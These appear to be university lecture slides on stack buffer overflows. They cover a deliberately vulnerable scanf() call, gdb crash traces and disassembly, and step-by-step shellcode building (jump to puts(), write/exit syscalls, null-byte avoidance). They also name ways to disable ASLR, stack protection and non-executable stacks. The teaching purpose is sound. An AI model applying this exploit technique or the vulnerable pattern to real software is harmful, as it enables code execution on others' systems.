Aaron Bloomfield (aaron@virginia.edu)
@github | ↑ |
Source code: overflow.c (in HTML)
/* Example of an unsafe read: copies a token from stdin into a fixed
 * 100-byte stack buffer and hands the buffer to do_something_with(). */
void vulnerable() {
char buffer[100];
/* read string from stdin; "%s" carries no field width, so scanf() keeps
 * writing past the end of buffer when the input is longer than it */
scanf("%s", buffer);
do_something_with(buffer);
}
What if we input a 1000 character string?
$ cat 1000-as.txt
aaaaaaaaaaaaaaaaaaaaaaaa (1000 a’s total)
$ ./overflow.exe < 1000-as.txt
Segmentation fault (core dumped)
$
$ gdb ./overflow.exe
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Reading symbols from ./overflow.exe...done.
(gdb) run < 1000-as.txt
Starting program: ./overflow.exe < 1000-as.txt
Program received signal SIGSEGV, Segmentation fault.
0x000000000040059c in vulnerable () at overflow.c:14
14 }
(gdb) bt
#0 0x000000000040059c in vulnerable () at overflow.c:14
#1 0x6161616161616161 in ?? ()
#2 0x6161616161616161 in ?? ()
...
#121 0x0000000000000000 in ?? ()
(gdb)
Source from gcc -S
: overflow.s (in HTML)
; vulnerable(): scanf("%s") into a stack buffer, then do_something_with(buffer).
; Intel syntax; buffer lives at rsp + 16 inside a 120-byte frame.
vulnerable:
sub rsp, 120 ; allocate 120 bytes of stack (buffer + spill slot)
movabs rdi, offset .L.str.1 ; arg 1 to scanf() is "%s"
lea rsi, [rsp + 16] ; arg 2 to scanf() is buffer
mov al, 0 ; al = 0 only (not all of eax): vector-register arg count for variadic scanf()
call __isoc99_scanf ; call scanf()
lea rdi, [rsp + 16] ; arg 1 to do_s_w(): buffer
mov dword ptr [rsp + 12], eax ; spill scanf()'s return value; never read back, so we can ignore this
call do_something_with ; call "do_s_w"
add rsp, 120 ; deallocate stack space; rsp is back at the return address
ret ; pop the return address into rip -- goodbye!
From objdump -d overflow.exe
:
0000000000400570 <vulnerable>:
400570: 48 83 ec 78 sub $0x78,%rsp
400574: 48 bf 44 06 40 00 00 movabs $0x400644,%rdi
40057b: 00 00 00
40057e: 48 8d 74 24 10 lea 0x10(%rsp),%rsi
400583: b0 00 mov $0x0,%al
400585: e8 b6 fe ff ff callq 400440 <__isoc99_scanf@plt>
40058a: 48 8d 7c 24 10 lea 0x10(%rsp),%rdi
40058f: 89 44 24 0c mov %eax,0xc(%rsp)
400593: e8 a8 ff ff ff callq 400540 <do_something_with>
400598: 48 83 c4 78 add $0x78,%rsp
40059c: c3 retq
40059d: 0f 1f 00 nopl (%rax)
00000000004005a0 <main>:
4005a0: 50 push %rax
4005a1: c7 44 24 04 00 00 00 movl $0x0,0x4(%rsp)
4005a8: 00
4005a9: e8 c2 ff ff ff callq 400570 <vulnerable>
4005ae: 31 c0 xor %eax,%eax
4005b0: 59 pop %rcx
4005b1: c3 retq
4005b2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
4005b9: 00 00 00
4005bc: 0f 1f 40 00 nopl 0x0(%rax)
(You can see the full objdump)
Before scanf()
is called:
After scanf()
is called: the buffer hath overflowed:
The return address (and beyond) has also been overwritten:
Source from gcc -S
: overflow.s (in HTML)
; vulnerable(): scanf("%s") into a stack buffer, then do_something_with(buffer).
; Intel syntax; buffer lives at rsp + 16 inside a 120-byte frame.
vulnerable:
sub rsp, 120 ; allocate 120 bytes of stack (buffer + spill slot)
movabs rdi, offset .L.str.1 ; arg 1 to scanf() is "%s"
lea rsi, [rsp + 16] ; arg 2 to scanf() is buffer
mov al, 0 ; al = 0 only (not all of eax): vector-register arg count for variadic scanf()
call __isoc99_scanf ; call scanf()
lea rdi, [rsp + 16] ; arg 1 to do_s_w(): buffer
mov dword ptr [rsp + 12], eax ; spill scanf()'s return value; never read back, so we can ignore this
call do_something_with ; call "do_s_w"
add rsp, 120 ; deallocate stack space; rsp is back at the return address
ret ; pop the return address into rip -- goodbye!
The ret
opcode tried to return to 0x6161616161616161 (eight 'a' bytes, 0x61 each, taken from the input), which is not in the memory allocated to the program
buffer
$ gdb ./overflow.exe
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
...
Reading symbols from ./overflow.exe...done.
(gdb) break overflow.c:11
Breakpoint 1 at 0x400583: file overflow.c, line 11.
(gdb) run
Starting program: ./overflow.exe
Breakpoint 1, vulnerable () at overflow.c:11
11 scanf("%s", buffer);
(gdb) print &buffer
$1 = (char (*)[100]) 0x7fffffffdce0
(gdb)
After a successful buffer overflow exploit:
puts()
via a tricky jump:
leal string(%rip), %edi
# Push the target address and "return" to it: retq pops the pushed value
# into rip, so execution continues at puts(). AT&T syntax, where '#' starts
# a comment (';' would be treated as a statement separator by GNU as).
pushq $0x4004e0 # address of puts() in
# target executable
retq
string:
.asciz "You have been infected with a virus!"
Note that this is in AT&T assembly syntax
; Intel (NASM) version of the jump-to-puts() snippet.
section .data
; NUL-terminated, like the .asciz in the AT&T version: puts() reads up to
; the terminating 0 byte and prints the trailing newline itself.
string db "You have been infected with a virus!", 0
section .text
lea edi, [string] ; arg 1 to puts(): address of the message
push 0x4004e0 ; address of puts() in
; target executable
ret ; pops the pushed address into rip, i.e. jumps to puts()
We’ll eventually convert this to shellcode (of a sort)
nasm -f elf -o test.o test.s (for Intel syntax)
as -o test.o test.s (for AT&T syntax)
objdump -d a.out
-f elf64
flag, then run through objdump -d. The result:
The assembly:
; Intel (NASM) version of the jump-to-puts() snippet.
section .data
; NUL-terminated, like the .asciz in the AT&T version: puts() reads up to
; the terminating 0 byte and prints the trailing newline itself.
string db "You have been infected with a virus!", 0
section .text
lea edi, [string] ; arg 1 to puts(): address of the message
push 0x4004e0 ; address of puts() in
; target executable
ret ; pops the pushed address into rip, i.e. jumps to puts()
But what if we don’t know where puts()
is?
syscall
opcode
syscall
calls
global mysyscall
section .data
string db "You have been infected with a virus!", 0x0a ; 36 characters + newline = 37 bytes
section .text
; mysyscall: print the message with a raw write syscall, then return to the caller.
mysyscall:
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer: byte count of string, newline included
syscall
ret
This can be compiled (with nasm -f elf64
), linked with an appropriate main()
function, and used to print out the above string.
The assembly yields the following machine code
; Body of mysyscall: set up the write syscall's arguments, invoke it, return.
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer in bytes
syscall ; enter the kernel with the registers loaded above
ret
The hex code:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: 8d 34 25 00 00 00 00 lea 0x0,%esi
11: ba 25 00 00 00 mov $0x25,%edx
16: 0f 05 syscall
18: c3 retq
Note that nothing is 64-bit (even when compiled with -f elf64
)
syscall
reads the entire 64-bit rax register
mov rax, 1
, not a mov eax, 1
syscall
syscall
to do so:
global mysyscall
section .data
string db "You have been infected with a virus!", 0x0a ; 36 characters + newline = 37 bytes
section .text
; mysyscall: print the message with a write syscall, then terminate the
; process with an exit syscall instead of returning.
mysyscall:
mov eax, 1 ; syscall function (sys_write)
mov edi, 1 ; print to stdout
lea esi, [string] ; buffer to print
mov edx, 37 ; size of buffer: byte count of string, newline included
syscall
mov eax, 60 ; syscall function (sys_exit)
xor edi, edi ; exit value (0)
syscall ; no ret follows: execution ends at this exit call
The machine code:
0: b8 01 00 00 00 mov $0x1,%eax
5: bf 01 00 00 00 mov $0x1,%edi
a: 8d 34 25 00 00 00 00 lea 0x0,%esi
11: ba 25 00 00 00 mov $0x25,%edx
16: 0f 05 syscall
18: b8 3c 00 00 00 mov $0x3c,%eax
1d: 31 ff xor %edi,%edi
1f: 0f 05 syscall
How do we use this as input to the program?
scanf()
and %s
The assembly on the previous slide results in:
26: 31 c0 xor %eax,%eax
28: b0 01 mov $0x1,%al
2a: 89 c7 mov %eax,%edi
2c: 8d 35 d0 ff ff ff lea -0x30(%rip),%esi
32: 31 d2 xor %edx,%edx
34: b2 24 mov $0x24,%dl
36: 0f 05 syscall
38: b0 3c mov $0x3c,%al
3a: 31 ff xor %edi,%edi
3c: 0f 05 syscall
Note that the lea
loads a negative offset, which has no 0x00 bytes
We put all that together, and we get:
stub_execve
(set rax to 59), you can execute any command
/bin/sh
in 27 bytes
-R
flag to setarch
-L
flag to setarch
bash
is the shell, and you don’t have to run the setarch
command each time you want to run a program
-R
disables ASLR, and -L
allows execution on the stack
-fno-stack-protector
flag when compiling